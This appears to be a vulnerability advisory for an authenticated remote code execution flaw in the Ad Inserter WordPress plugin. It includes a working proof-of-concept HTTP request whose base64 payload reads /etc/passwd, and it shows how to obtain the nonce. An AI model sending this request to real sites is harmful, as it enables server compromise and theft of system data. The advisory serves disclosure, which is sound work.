Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability.

PoC

The nonce (ai_check in the final request) can be obtained by querying the homepage with the AI_WP_DEBUGGING cookie set to 2. Then, use an account with a role as low as subscriber to perform the request (payload below in the code parameter is base64 encoded for : POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wp-admin/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 130 Origin: http://127.0.0.1 Connection: close Cookie: [SNIPPED] Upgrade-Insecure-Requests: 1 action=ai_ajax_backend&preview;=1&ai;_check=[SNIPPED]&code;=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php;=1